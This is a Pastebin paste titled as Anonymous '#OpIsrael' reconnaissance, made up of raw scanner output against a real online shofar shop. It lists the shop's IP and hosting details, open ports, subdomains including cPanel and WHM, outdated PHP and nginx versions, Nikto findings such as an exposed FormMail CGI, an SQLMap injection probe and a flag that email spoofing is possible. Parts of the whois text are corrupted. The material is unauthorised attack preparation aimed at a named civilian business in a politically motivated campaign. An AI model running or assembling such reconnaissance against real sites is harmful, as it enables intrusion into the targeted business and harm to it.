Advertisement
Guest User

Anonymous JTSEC #OpIsrael Full Recon #13

a guest
Nov 14th, 2018
1,589
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 123.21 KB | None | 0 0
  1. #######################################################################################################################################
  2. Hostname www.israelshofar.com ISP TierPoint, LLC
  3. Continent North America Flag
  4. US
  5. Country United States Country Code US
  6. Region California Local time 13 Nov 2018 17:34 PST
  7. City Los Angeles Postal Code 90014
  8. IP Address 143.95.226.53 Latitude 34.049
  9. Longitude -118.264
  10.  
  11. #######################################################################################################################################
  12. > www.israelshofar.com
  13. Server: 194.187.251.67
  14. Address: 194.187.251.67#53
  15.  
  16. Non-authoritative answer:
  17. www.israelshofar.com canonical name = israelshofar.com.
  18. Name: israelshofar.com
  19. Address: 143.95.226.53
  20. #######################################################################################################################################
  21. HostIP:143.95.226.53
  22. HostName:www.israelshofar.com
  23.  
  24. Gathered Inet-whois information for 143.95.226.53
  25. ---------------------------------------------------------------------------------------------------------------------------------------
  26.  
  27.  
  28. inetnum: 143.94.0.0 - 143.96.255.255
  29. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  30. descr: IPv4 address block not managed by the RIPE NCC
  31. remarks: ------------------------------------------------------
  32. remarks:
  33. remarks: You can find the whois server to query, or the
  34. remarks: IANA registry to query on this web page:
  35. remarks: http://www.iana.org/assignments/ipv4-address-space
  36. remarks:
  37. remarks: You can access databases of other RIRs at:
  38. remarks:
  39. remarks: AFRINIC (Africa)
  40. remarks: http://www.afrinic.net/ whois.afrinic.net
  41. remarks:
  42. remarks: APNIC (Asia Pacific)
  43. remarks: http://www.apnic.net/ whois.apnic.net
  44. remarks:
  45. remarks: ARIN (Northern America)
  46. remarks: http://www.arin.net/ whois.arin.net
  47. remarks:
  48. remarks: LACNIC (Latin America and the Carribean)
  49. remarks: http://www.lacnic.net/ whois.lacnic.net
  50. remarks:
  51. remarks: IANA IPV4 Recovered Address Space
  52. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
  53. remarks:
  54. remarks: ------------------------------------------------------
  55. country: EU # Country is really world wide
  56. admin-c: IANA1-RIPE
  57. tech-c: IANA1-RIPE
  58. status: ALLOCATED UNSPECIFIED
  59. mnt-by: RIPE-NCC-HM-MNT
  60. mnt-lower: RIPE-NCC-HM-MNT
  61. created: 2011-07-11T12:35:44Z
  62. last-modified: 2018-09-04T13:01:18Z
  63. source: RIPE
  64.  
  65. role: Internet Assigned Numbers Authority
  66. address: see http://www.iana.org.
  67. admin-c: IANA1-RIPE
  68. tech-c: IANA1-RIPE
  69. nic-hdl: IANA1-RIPE
  70. remarks: For more information on IANA services
  71. remarks: go to IANA web site at http://www.iana.org.
  72. mnt-by: RIPE-NCC-MNT
  73. created: 1970-01-01T00:00:00Z
  74. last-modified: 2001-09-22T09:31:27Z
  75. source: RIPE # Filtered
  76.  
  77. % This query was served by the RIPE Database Query Service version 1.92.6 (BLAARKOP)
  78.  
  79.  
  80.  
  81. Gathered Inic-whois information for israelshofar.com
  82. ---------------------------------------------------------------------------------------------------------------------------------------
  83. Domain Name: ISRAELSHOFAR.COM
  84. Registry Domain ID: 131412763_DOMAIN_COM-VRSN
  85. Registrar WHOIS Server: whois.enom.com
  86. Registrar URL: http://www.enom.com
  87. Updated Date: 2018-08-16T05:22:27Z
  88. Creation Date: 2004-09-30T14:52:12Z
  89. Registry Expiry Date: 2019-09-30T14:52:12Z
  90. Registrar: eNom, Inc.
  91. Registrar IANA ID: 48
  92. Registrar Abuse Contact Email:
  93. Registrar Abuse Contact Phone:
  94. Domain Status: clientTransferProhibited https�U@ted
  95. Name Server: NS1.ARVIXESHARED.COM
  96. Name Server: NS2.ARVIXESHARED.COM
  97. DNSSEC: unsigned
  98. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  99. >>> Last update of whois database: 2018-11-14T01:56:19Z <<<
  100.  
  101. For more information on Whois status codes, please visit https://icann.org/epp
  102.  
  103. NOTICE: The expiration date displayed in this record is the date the
  104. registrar's sponsorship of the domain name registration in the registry is
  105. currently set to expire. This date does not neceYV@ssari�zHl0y r�eflect YG��thXV@e exp�YG��irgV@ation��������
  106. date of the domain name registrant's agreement with the sponsoring
  107. registrar. Users may consult the sponsoring reg�U@tabas�~He0 to�
  108. view the registrar's reported date of expiration for this registration.
  109.  
  110. TERMS OF USE: You are not authorized to access or query our Whois
  111. database through the use of electronic processes that are high-volume and
  112. automated except as reasonably necessary to register domain names or
  113. modify existing registrations; the Data in VeriSign Global Registry
  114. Services' ("VeriSign") Whois database is provided by VeriSign for
  115. information purposes only, and to assist persons�U@rmati�~Ho0n
  116. about or related to a domain name registration record. VeriSign does not
  117. guarantee its accuracy. By submitting a Whois query, you agree to abide
  118. by the following terms of use: You agree that you may use this Data only
  119. for lawful purposes and that under no circumstances will you use this Data
  120. to: (1) allow, enable, or otherwise support the transmission of mass
  121. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  122. or facsimile; or (2) enable high volume, automat�U@ed, e�~Hl0ectgronic �YG��prU@ocessZG��es�U@
  123. that apply to VeriSign (or its computer systems). The compilation,
  124. repackaging, dissemination or other use of this Data is expressly
  125. prohibited without the prior written consent of VeriSign. You agree not to
  126. use electronic processes that are automated and high-volume to access or
  127. query the Whois database except as reasonably necessary to register
  128. domain names or modify existing registrations. VeriSign reserves the right
  129. to restrict your access to the Whois database in�U@ its �~Hs0ole discre�ZG��tiU@on to�ZG�� e�U@nsure��������
  130. operational stability. VeriSign may restrict or terminate your access to the
  131. Whois database for failure to abide by these terms of use. VeriSign
  132. reserves the right to modify these terms at any time.
  133.  
  134. The Registry database contains ONLY .COM, .NET, .EDU domains and
  135. Registrars.
  136.  
  137. Gathered Netcraft information for www.israelshofar.com
  138. --------------------------------------------------------------------------------------------------------------------------------------
  139.  
  140. Retrieving Netcraft.com information for www.israelshofar.com
  141. Netcraft.com Information gathered
  142.  
  143. Gathered Subdomain information for israelshofar.com
  144. --------------------------------------------------------------------------------------------------------------------------------------
  145. Searching Google.com:80...
  146. HostName:www.israelshofar.com
  147. HostIP:143.95.226.53
  148. Searching Altavista.com:80...
  149. Found 1 possible subdomain(s) for host israelshofar.com, Searched 0 pages containing 0 results
  150.  
  151. Gathered E-Mail information for israelshofar.com
  152. ---------------------------------------------------------------------------------------------------------------------------------------
  153. Searching Google.com:80...
  154. Searching Altavista.com:80...
  155. Found 0 E-Mail(s) for host israelshofar.com, Searched 0 pages containing 0 results
  156.  
  157. Gathered TCP Port information for 143.95.226.53
  158. --------------------------------------------------------------------------------------------------------------------------------------
  159.  
  160. Port State
  161.  
  162. 21/tcp open
  163. 22/tcp open
  164. 26/tcp open
  165. 53/tcp open
  166. 80/tcp open
  167. 110/tcp open
  168. 143/tcp open
  169.  
  170. Portscan Finished: Scanned 150 ports, 140 ports were in state closed
  171.  
  172. #######################################################################################################################################
  173. [i] Scanning Site: https://www.israelshofar.com
  174.  
  175.  
  176.  
  177. B A S I C I N F O
  178. =======================================================================================================================================
  179.  
  180.  
  181. [+] Site Title: Shofar from Jerusalem – Special Shofars offers – IsraelShofar.com
  182. [+] IP address: 143.95.226.53
  183. [+] Web Server: nginx/1.14.1
  184. [+] CMS: Could Not Detect
  185. [+] Cloudflare: Not Detected
  186. [+] Robots File: Found
  187.  
  188. -------------[ contents ]----------------
  189. User-agent: *
  190. Disallow:
  191. Sitemap: http://www.israeltallit.com/index.php?route=feed/google_sitemap
  192. -----------[end of contents]-------------
  193.  
  194.  
  195.  
  196. W H O I S L O O K U P
  197. =======================================================================================================================================
  198.  
  199. Domain Name: ISRAELSHOFAR.COM
  200. Registry Domain ID: 131412763_DOMAIN_COM-VRSN
  201. Registrar WHOIS Server: whois.enom.com
  202. Registrar URL: http://www.enom.com
  203. Updated Date: 2018-08-16T05:22:27Z
  204. Creation Date: 2004-09-30T14:52:12Z
  205. Registry Expiry Date: 2019-09-30T14:52:12Z
  206. Registrar: eNom, Inc.
  207. Registrar IANA ID: 48
  208. Registrar Abuse Contact Email:
  209. Registrar Abuse Contact Phone:
  210. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  211. Name Server: NS1.ARVIXESHARED.COM
  212. Name Server: NS2.ARVIXESHARED.COM
  213. DNSSEC: unsigned
  214. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  215. >>> Last update of whois database: 2018-11-14T01:56:34Z <<<
  216.  
  217. For more information on Whois status codes, please visit https://icann.org/epp
  218.  
  219.  
  220.  
  221. The Registry database contains ONLY .COM, .NET, .EDU domains and
  222. Registrars.
  223.  
  224.  
  225.  
  226.  
  227. G E O I P L O O K U P
  228. =======================================================================================================================================
  229.  
  230. [i] IP Address: 143.95.226.53
  231. [i] Country: US
  232. [i] State: California
  233. [i] City: Los Angeles
  234. [i] Latitude: 34.049400
  235. [i] Longitude: -118.264099
  236.  
  237.  
  238.  
  239.  
  240. H T T P H E A D E R S
  241. =======================================================================================================================================
  242.  
  243.  
  244. [i] HTTP/1.1 200 OK
  245. [i] Server: nginx/1.14.1
  246. [i] Date: Wed, 14 Nov 2018 01:56:54 GMT
  247. [i] Content-Type: text/html; charset=utf-8
  248. [i] Connection: close
  249. [i] X-Powered-By: PHP/5.4.45
  250. [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
  251. [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  252. [i] Pragma: no-cache
  253. [i] Set-Cookie: PHPSESSID=6c5b2c4e7b55a4d55b59068f994dee96; path=/
  254. [i] Set-Cookie: language=en; expires=Fri, 14-Dec-2018 01:56:54 GMT; path=/; domain=www.israelshofar.com
  255. [i] Set-Cookie: currency=USD; expires=Fri, 14-Dec-2018 01:56:54 GMT; path=/; domain=www.israelshofar.com
  256. [i] Vary: User-Agent,Accept-Encoding
  257.  
  258.  
  259.  
  260.  
  261. D N S L O O K U P
  262. =======================================================================================================================================
  263.  
  264. israelshofar.com. 21599 IN SOA ns1.arvixeshared.com. root.localhost.localhost. 2018062902 3600 7200 1209600 86400
  265. israelshofar.com. 21599 IN A 143.95.226.53
  266. israelshofar.com. 21599 IN MX 0 mail.israelshofar.com.
  267. israelshofar.com. 21599 IN NS ns1.arvixeshared.com.
  268. israelshofar.com. 21599 IN NS ns2.arvixeshared.com.
  269.  
  270.  
  271.  
  272.  
  273. S U B N E T C A L C U L A T I O N
  274. =======================================================================================================================================
  275.  
  276. Address = 143.95.226.53
  277. Network = 143.95.226.53 / 32
  278. Netmask = 255.255.255.255
  279. Broadcast = not needed on Point-to-Point links
  280. Wildcard Mask = 0.0.0.0
  281. Hosts Bits = 0
  282. Max. Hosts = 1 (2^0 - 0)
  283. Host Range = { 143.95.226.53 - 143.95.226.53 }
  284.  
  285.  
  286.  
  287. N M A P P O R T S C A N
  288. =======================================================================================================================================
  289.  
  290.  
  291. Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-14 01:56 UTC
  292. Nmap scan report for israelshofar.com (143.95.226.53)
  293. Host is up (0.040s latency).
  294. rDNS record for 143.95.226.53: ip-143-95-226-53.iplocal
  295. PORT STATE SERVICE
  296. 21/tcp open ftp
  297. 22/tcp open ssh
  298. 23/tcp filtered telnet
  299. 80/tcp open http
  300. 110/tcp open pop3
  301. 143/tcp open imap
  302. 443/tcp open https
  303. 3389/tcp closed ms-wbt-server
  304.  
  305. Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds
  306.  
  307. #######################################################################################################################################
  308. [?] Enter the target: https://www.israelshofar.com/
  309. [!] IP Address : 143.95.226.53
  310. [!] Server: nginx/1.14.1
  311. [!] Powered By: PHP/5.4.45
  312. [+] Clickjacking protection is not in place.
  313. [!] www.israelshofar.com doesn't seem to use a CMS
  314. [+] Honeypot Probabilty: 30%
  315. ---------------------------------------------------------------------------------------------------------------------------------------
  316. [~] Trying to gather whois information for www.israelshofar.com
  317. [+] Whois information found
  318. [-] Unable to build response, visit https://who.is/whois/www.israelshofar.com
  319. --------------------------------------------------------------------------------------------------------------------------------------
  320. PORT STATE SERVICE
  321. 21/tcp open ftp
  322. 22/tcp open ssh
  323. 23/tcp filtered telnet
  324. 80/tcp open http
  325. 110/tcp open pop3
  326. 143/tcp open imap
  327. 443/tcp open https
  328. 3389/tcp closed ms-wbt-server
  329. Nmap done: 1 IP address (1 host up) scanned in 1.37 seconds
  330. --------------------------------------------------------------------------------------------------------------------------------------
  331.  
  332. [+] DNS Records
  333. ns1.arvixeshared.com. (169.55.246.167) AS36351 SoftLayer Technologies Inc. United States
  334. ns2.arvixeshared.com. (108.168.166.90) AS36351 SoftLayer Technologies Inc. United States
  335.  
  336. [+] MX Records
  337. 0 (143.95.226.53) AS36024 Colo4, LLC United States
  338.  
  339. [+] Host Records (A)
  340. www.israelshofar.comHTTP: (ip-143-95-226-53.iplocal) (143.95.226.53) AS36024 Colo4, LLC United States
  341.  
  342. [+] TXT Records
  343.  
  344. [+] DNS Map: https://dnsdumpster.com/static/map/israelshofar.com.png
  345.  
  346. [>] Initiating 3 intel modules
  347. [>] Loading Alpha module (1/3)
  348. [>] Beta module deployed (2/3)
  349. [>] Gamma module initiated (3/3)
  350.  
  351.  
  352. [+] Emails found:
  353. ---------------------------------------------------------------------------------------------------------------------------------------
  354. pixel-1542160631851750-web-@www.israelshofar.com
  355. pixel-1542160638494180-web-@www.israelshofar.com
  356. No hosts found
  357. [+] Virtual hosts:
  358. ---------------------------------------------------------------------------------------------------------------------------------------
  359. [~] Crawling the target for fuzzable URLs
  360. [+] Found 1 fuzzable URLs
  361. https://www.israelshofar.com//index.php?route=product/allproduct
  362. [~] Using SQLMap api to check for SQL injection vulnerabilities. Don't worry we are using an online service and it doesn't depend on your internet connection. This scan will take 2-3 minutes.
  363. ######################################################################################################################################
  364. [+] Hosting Info for Website: www.israelshofar.com
  365. [+] Visitors per day: < 200
  366. [+] IP Address: ...
  367. [+] IP Reverse DNS (Host): ip-143-95-226-53.iplocal
  368. [+] Hosting IP Range: 143.95.0.0 - 143.95.255.255 (65,536 ip)
  369. [+] Hosting Address: 523 W 6Th St. Los Angeles, CA, 90014, US
  370. [+] Hosting Country: USA
  371. [+] Hosting Phone: +1-213-536-4767
  372. [+] Hosting Website: www.athenixinc.com
  373. [+] CIDR: 143.95.0.0/16
  374. [+] Hosting CIDR: 143.95.0.0/16
  375.  
  376. [+] NS: israelshofar.com
  377. [+] NS: ns2.arvixeshared.com
  378. [+] NS: ns1.arvixeshared.com
  379. #######################################################################################################################################
  380. ; <<>> DiG 9.11.5-1-Debian <<>> israelshofar.com
  381. ;; global options: +cmd
  382. ;; Got answer:
  383. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3664
  384. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  385.  
  386. ;; OPT PSEUDOSECTION:
  387. ; EDNS: version: 0, flags:; udp: 4096
  388. ;; QUESTION SECTION:
  389. ;israelshofar.com. IN A
  390.  
  391. ;; ANSWER SECTION:
  392. israelshofar.com. 85188 IN A 143.95.226.53
  393.  
  394. ;; Query time: 198 msec
  395. ;; SERVER: 194.187.251.67#53(194.187.251.67)
  396. ;; WHEN: mar nov 13 21:19:33 EST 2018
  397. ;; MSG SIZE rcvd: 61
  398. #######################################################################################################################################
  399. ; <<>> DiG 9.11.5-1-Debian <<>> +trace israelshofar.com
  400. ;; global options: +cmd
  401. . 83002 IN NS c.root-servers.net.
  402. . 83002 IN NS a.root-servers.net.
  403. . 83002 IN NS j.root-servers.net.
  404. . 83002 IN NS f.root-servers.net.
  405. . 83002 IN NS i.root-servers.net.
  406. . 83002 IN NS e.root-servers.net.
  407. . 83002 IN NS b.root-servers.net.
  408. . 83002 IN NS k.root-servers.net.
  409. . 83002 IN NS h.root-servers.net.
  410. . 83002 IN NS m.root-servers.net.
  411. . 83002 IN NS d.root-servers.net.
  412. . 83002 IN NS g.root-servers.net.
  413. . 83002 IN NS l.root-servers.net.
  414. . 83002 IN RRSIG NS 8 0 518400 20181126170000 20181113160000 2134 . l5Ltt4GuB8L7xlbS3uLJ+8J7xeQcqjMv1AW1goVGshkcbWKMfiJJlhN4 DG6GdBNP+X+FlZNJzs9dhqCoH3mdTwUKw4rsovkeUBptXvwaFlcQyaQt I/sz2h4dpg4Iygrz2+KZru9jaklEF+3m3uCcclEzW7WamSjTUlJ35IEj Co7Tyz8/1jGIqrvCMDLXGa5A8JwIt1e7Lxd6KJ1J2YWca5NyZw10qNhy r96ZgRBXcBnatbjjfg/8PfF2Ez3KLhgzjDeOB7TUkYl+X1t4WQDV1mYT NuhqrWekXY2rR3ii1Ny76V0kwrB6KUexhca+nbGRGjZrYKRmQ1xRpIOw Dwvrlg==
  415. ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 208 ms
  416.  
  417. com. 172800 IN NS a.gtld-servers.net.
  418. com. 172800 IN NS b.gtld-servers.net.
  419. com. 172800 IN NS c.gtld-servers.net.
  420. com. 172800 IN NS d.gtld-servers.net.
  421. com. 172800 IN NS e.gtld-servers.net.
  422. com. 172800 IN NS f.gtld-servers.net.
  423. com. 172800 IN NS g.gtld-servers.net.
  424. com. 172800 IN NS h.gtld-servers.net.
  425. com. 172800 IN NS i.gtld-servers.net.
  426. com. 172800 IN NS j.gtld-servers.net.
  427. com. 172800 IN NS k.gtld-servers.net.
  428. com. 172800 IN NS l.gtld-servers.net.
  429. com. 172800 IN NS m.gtld-servers.net.
  430. com. 86400 IN DS 30909 8 2 E2D3C916F6DEEAC73294E8268FB5885044A833FC5459588F4A9184CF C41A5766
  431. com. 86400 IN RRSIG DS 8 1 86400 20181126170000 20181113160000 2134 . LAtBNFUIeu6Y5mnGCJacrnAn63SyPdwW1+dcWc6Tc/V+CCukG0Evz+gH TzWXs8fEykqX7edNshUoktP7VwrrTMQBppjMim7pyHMmDk9VL4HieFCM E3wfxxTNkaueyfOSHcOR7L2NoU1U8+vic3M6t6PNni33pKNJDjX23zD8 o0VYYA3dUtfKGJbh+ybe5aP3SmX/c9x0dVSliqGRzBzqwK/88a0K5aok /EzNoAXyd5I3TBln58mzQA4OU09nTgRkRHEtTbNU/k7+3rHqiARCSSLO S/WM5AqJqjXVF9KxyjUHiRIl4DP3RdBo6uiklTMMsEAw/03IUHd1ccl/ Vm7jdA==
  432. ;; Received 1176 bytes from 198.97.190.53#53(h.root-servers.net) in 281 ms
  433.  
  434. israelshofar.com. 172800 IN NS ns1.arvixeshared.com.
  435. israelshofar.com. 172800 IN NS ns2.arvixeshared.com.
  436. CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN NSEC3 1 1 0 - CK0Q1GIN43N1ARRC9OSM6QPQR81H5M9A NS SOA RRSIG DNSKEY NSEC3PARAM
  437. CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN RRSIG NSEC3 8 2 86400 20181120054354 20181113043354 37490 com. ChmOfer+B8H8xa2ri+2HmEBdw3uNJiOsIGeATznlYR4oIrhoI3GT6RAk WvNC9yn8eHErxrQtFDm+lapSSmGwept4FK+xPRFv2rcFaq9dJhPz1kNB 9LkaPNt3+AjvjPH2C7YSctyZVT+Wp3gtAHrBsrfkr36kum3Q5GBCnC8J nwI=
  438. LERF8LJ4QGG1S0F35GK6J07AB7I7MCJU.com. 86400 IN NSEC3 1 1 0 - LERKB06PF4OQT869HSJ0LS4UU1S0O253 NS DS RRSIG
  439. LERF8LJ4QGG1S0F35GK6J07AB7I7MCJU.com. 86400 IN RRSIG NSEC3 8 2 86400 20181120054550 20181113043550 37490 com. wtK5HUHa2RseRGkn1dRC8MWGwxx/L+NKJTsLTsveTthKzhb6Kteun5RY 3Oz3groY4JjUAKTATfDMQ2iGmPRM1Mi800rZNxMkdUcbr7sECL5kaQ6r dd2QarkKCQCNYPI/nWe0A772HgWQhHgdciaxseUfRzA+WXeTgxmjjWJv Z8k=
  440. ;; Received 611 bytes from 2001:503:39c1::30#53(i.gtld-servers.net) in 207 ms
  441.  
  442. israelshofar.com. 86400 IN A 143.95.226.53
  443. israelshofar.com. 86400 IN NS ns1.arvixeshared.com.
  444. israelshofar.com. 86400 IN NS ns2.arvixeshared.com.
  445. ;; Received 99 bytes from 169.55.246.167#53(ns1.arvixeshared.com) in 324 ms
  446.  
  447. #######################################################################################################################################
  448. Ip Address Status Type Domain Name Server
  449. ---------------------------------------------------------------------------------------------------------------------------------------
  450. 143.95.226.53 200 host ftp.israelshofar.com
  451. 127.0.0.1 host localhost.israelshofar.com
  452. 143.95.226.53 301 alias mail.israelshofar.com
  453. 143.95.226.53 301 host israelshofar.com
  454. 143.95.226.53 301 host webmail.israelshofar.com
  455. 143.95.226.53 301 alias www.israelshofar.com
  456. 143.95.226.53 301 host israelshofar.com
  457. #######################################################################################################################################
  458. [+] Testing domain
  459. www.israelshofar.com 143.95.226.53
  460. [+] Dns resolving
  461. Domain name Ip address Name server
  462. israelshofar.com 143.95.226.53 ip-143-95-226-53.iplocal
  463. Found 1 host(s) for israelshofar.com
  464. [+] Testing wildcard
  465. Ok, no wildcard found.
  466.  
  467. [+] Scanning for subdomain on israelshofar.com
  468. [!] Wordlist not specified. I scannig with my internal wordlist...
  469. Estimated time about 143.92 seconds
  470.  
  471. Subdomain Ip address Name server
  472.  
  473. ftp.israelshofar.com 143.95.226.53 ip-143-95-226-53.iplocal
  474. localhost.israelshofar.com 127.0.0.1 localhost
  475. mail.israelshofar.com 143.95.226.53 ip-143-95-226-53.iplocal
  476. webmail.israelshofar.com 143.95.226.53 ip-143-95-226-53.iplocal
  477. www.israelshofar.com 143.95.226.53 ip-143-95-226-53.iplocal
  478.  
  479. #######################################################################################################################################
  480. [*] Processing domain israelshofar.com
  481. [+] Getting nameservers
  482. 108.168.166.90 - ns2.arvixeshared.com
  483. 169.55.246.167 - ns1.arvixeshared.com
  484. [-] Zone transfer failed
  485.  
  486. [+] MX records found, added to target list
  487. 0 mail.israelshofar.com.
  488.  
  489. [*] Scanning israelshofar.com for A records
  490. 143.95.226.53 - israelshofar.com
  491. 143.95.226.53 - autoconfig.israelshofar.com
  492. 143.95.226.53 - autodiscover.israelshofar.com
  493. 143.95.226.53 - cpanel.israelshofar.com
  494. 143.95.226.53 - ftp.israelshofar.com
  495. 127.0.0.1 - localhost.israelshofar.com
  496. 143.95.226.53 - mail.israelshofar.com
  497. 143.95.226.53 - webdisk.israelshofar.com
  498. 143.95.226.53 - webmail.israelshofar.com
  499. 143.95.226.53 - whm.israelshofar.com
  500. 143.95.226.53 - www.israelshofar.com
  501. #######################################################################################################################################
  502. [*] Performing General Enumeration of Domain: israelshofar.com
  503. [-] DNSSEC is not configured for israelshofar.com
  504. [*] SOA ns1.arvixeshared.com 169.55.246.167
  505. [*] NS ns2.arvixeshared.com 108.168.166.90
  506. [*] MX mail.israelshofar.com 143.95.226.53
  507. [*] A israelshofar.com 143.95.226.53
  508. [*] Enumerating SRV Records
  509. [*] SRV _caldav._tcp.israelshofar.com dunlin.arvixe.com 143.95.42.128 2079 0
  510. [*] SRV _caldavs._tcp.israelshofar.com dunlin.arvixe.com 143.95.42.128 2080 0
  511. [*] SRV _carddav._tcp.israelshofar.com dunlin.arvixe.com 143.95.42.128 2079 0
  512. [*] SRV _carddavs._tcp.israelshofar.com dunlin.arvixe.com 143.95.42.128 2080 0
  513. [+] 4 Records Found
  514. #######################################################################################################################################
  515. Start: 2018-11-14T02:23:47+0000
  516. HOST: web01 Loss% Snt Last Avg Best Wrst StDev
  517. 1.|-- 45.79.12.202 0.0% 3 1.1 1.0 0.7 1.1 0.2
  518. 2.|-- 45.79.12.2 0.0% 3 3.2 1.6 0.6 3.2 1.4
  519. 3.|-- hu0-7-0-7.ccr41.dfw03.atlas.cogentco.com 0.0% 3 2.3 1.8 1.4 2.3 0.5
  520. 4.|-- be2763.ccr31.dfw01.atlas.cogentco.com 0.0% 3 1.6 2.1 1.6 2.7 0.6
  521. 5.|-- be2560.rcr21.b010621-0.dfw01.atlas.cogentco.com 0.0% 3 2.5 2.4 2.0 2.6 0.3
  522. 6.|-- 38.122.58.34 0.0% 3 1.5 1.7 1.5 2.0 0.2
  523. 7.|-- 207.210.229.6 0.0% 3 1.9 2.2 1.9 2.6 0.4
  524. 8.|-- infweb6.smtpserve.com 0.0% 3 2.1 1.8 1.6 2.1 0.2
  525. 9.|-- ip-143-95-226-53.iplocal 0.0% 3 1.6 1.8 1.6 2.0 0.2
  526.  
  527.  
  528. ######################################################################################################################################
  529. --------------------------------------------------------------------------------------------------------------------------------------
  530. + Target IP: 143.95.226.53
  531. + Target Hostname: 143.95.226.53
  532. + Target Port: 443
  533. ---------------------------------------------------------------------------------------------------------------------------------------
  534. + SSL Info: Subject: /OU=Domain Control Validated/OU=Hosted by HostGator.com, LLC./OU=PositiveSSL Wildcard/CN=*.arvixeshared.com
  535. Ciphers: ECDHE-RSA-AES256-GCM-SHA384
  536. Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO RSA Domain Validation Secure Server CA
  537. + Start Time: 2018-11-13 20:57:49 (GMT-5)
  538. ---------------------------------------------------------------------------------------------------------------------------------------
  539. + Server: nginx/1.14.1
  540. + The anti-clickjacking X-Frame-Options header is not present.
  541. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  542. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  543. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  544. + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
  545. + Server is using a wildcard certificate: *.arvixeshared.com
  546. + Hostname '143.95.226.53' does not match certificate's names: *.arvixeshared.com
  547. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
  548. + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
  549. + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
  550. + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: Connect failed: ; Connection timed out at /var/lib/nikto/plugins/LW2.pm line 5157.
  551. : Connection timed out
  552. + Scan terminated: 12 error(s) and 10 item(s) reported on remote host
  553. + End Time: 2018-11-13 21:55:09 (GMT-5) (3440 seconds)
  554. ---------------------------------------------------------------------------------------------------------------------------------------
  555. ######################################################################################################################################
  556. dnsenum VERSION:1.2.4
  557.  
  558. ----- www.israelshofar.com -----
  559.  
  560.  
  561. Host's addresses:
  562. __________________
  563.  
  564. israelshofar.com. 85945 IN A 143.95.226.53
  565.  
  566.  
  567. Name Servers:
  568. ______________
  569.  
  570. ns2.arvixeshared.com. 86323 IN A 108.168.166.90
  571. ns1.arvixeshared.com. 86323 IN A 169.55.246.167
  572.  
  573.  
  574. Mail (MX) Servers:
  575. ___________________
  576.  
  577. mail.israelshofar.com. 86400 IN CNAME israelshofar.com.
  578. israelshofar.com. 86400 IN A 143.95.226.53
  579.  
  580.  
  581. Trying Zone Transfers and getting Bind Versions:
  582. _________________________________________________
  583.  
  584.  
  585. Trying Zone Transfer for www.israelshofar.com on ns2.arvixeshared.com ...
  586.  
  587. Trying Zone Transfer for www.israelshofar.com on ns1.arvixeshared.com ...
  588.  
  589. brute force file not specified, bay.
  590. #######################################################################################################################################
  591.  
  592. Running Source: Ask
  593. Running Source: Archive.is
  594. Running Source: Baidu
  595. Running Source: Bing
  596. Running Source: CertDB
  597. Running Source: CertificateTransparency
  598. Running Source: Certspotter
  599. Running Source: Commoncrawl
  600. Running Source: Crt.sh
  601. Running Source: Dnsdb
  602. Running Source: DNSDumpster
  603. Running Source: DNSTable
  604. Running Source: Dogpile
  605. Running Source: Exalead
  606. Running Source: Findsubdomains
  607. Running Source: Googleter
  608. Running Source: Hackertarget
  609. Running Source: Ipv4Info
  610. Running Source: PTRArchive
  611. Running Source: Sitedossier
  612. Running Source: Threatcrowd
  613. Running Source: ThreatMiner
  614. Running Source: WaybackArchive
  615. Running Source: Yahoo
  616.  
  617. Running enumeration on www.israelshofar.com
  618.  
  619. dnsdb: Unexpected return status 503
  620.  
  621. ipv4info: <nil>
  622.  
  623. waybackarchive: Get https://web.archive.org/cdx/search/cdx?url=*.www.israelshofar.com/*&output=json&fl=original&collapse=urlkey&page=: net/http: invalid header field value "http://web.archive.org/cdx/search/cdx?url=*.www.israelshofar.com/*&output=json&fl=original&collapse=urlkey&page=\x00" for key Referer
  624.  
  625.  
  626. Starting Bruteforcing of www.israelshofar.com with 9985 words
  627.  
  628. Total 1 Unique subdomains found for www.israelshofar.com
  629.  
  630. .www.israelshofar.com
  631. #######################################################################################################################################
  632. [+] www.israelshofar.com has no SPF record!
  633. [*] No DMARC record found. Looking for organizational record
  634. [+] No organizational DMARC record
  635. [+] Spoofing possible for www.israelshofar.com!
  636. #######################################################################################################################################
  637. __
  638. ____ _____ ___ ______ _/ /_____ ____ ___
  639. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  640. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  641. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  642. /_/ discover v0.5.0 - by @michenriksen
  643.  
  644. Identifying nameservers for www.israelshofar.com... Done
  645. Using nameservers:
  646.  
  647. - 169.55.246.167
  648. - 108.168.166.90
  649.  
  650. Checking for wildcard DNS... Done
  651.  
  652. Running collector: Threat Crowd... Done (0 hosts)
  653. Running collector: DNSDB... Error
  654. -> DNSDB returned unexpected response code: 503
  655. Running collector: Netcraft... Done (0 hosts)
  656. Running collector: PublicWWW... Done (0 hosts)
